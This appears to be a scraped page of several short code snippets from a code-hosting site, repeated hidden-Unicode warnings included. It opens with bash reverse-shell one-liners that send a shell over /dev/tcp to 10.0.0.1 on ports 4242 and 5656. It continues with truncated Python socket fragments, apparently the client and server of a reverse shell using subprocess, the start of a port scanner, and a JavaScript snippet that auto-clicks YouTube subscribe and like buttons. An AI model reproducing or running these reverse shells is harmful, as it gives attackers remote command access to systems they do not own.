bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Bash TCP | |
| bash -i >& /dev/tcp/10.0.0.1/5656 0>&1 | |
| 0<&196;exec 196<>/dev/tcp/10.0.0.1/5656; sh <&196 >&196 2>&196 | |
| /bin/bash -l > /dev/tcp/10.0.0.1/5656 0<&1 2>&1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pyfiglet | |
| import sys | |
| import socket | |
| from datetime import datetime | |
| """ | |
| This Project in a Development !!! | |
| 17 May 2021 | |
| """ | |
| def intro(target): | |
| ascii_banner = pyfiglet.figlet_format("PORT SCANNER") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import socket | |
| import subprocess | |
| host = "127.0.0.1" | |
| port = 5000 | |
| BUFFER_SIZE = 1024*128 | |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| sock.connect((host,port)) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import socket | |
| host = "127.0.0.1" | |
| port = 5000 | |
| BUFFER_SIZE = 1024*128 | |
| # Create a TCP socket | |
| sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| # Bind a local socket to the port |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // iLab Academy : https://ilabacademy.blogspot.com | |
| // Author : Zenon J. | |
| // Title : Subscribe Youtube using Javascript | |
| //Type this code to Subscribe | |
| document.getElementsByClassName("style-scope ytd-subscribe-button-renderer")[0].click(); | |
| //Type this code to Like | |
| document.getElementsByClassName("style-scope ytd-toggle-button-renderer")[0].click(); |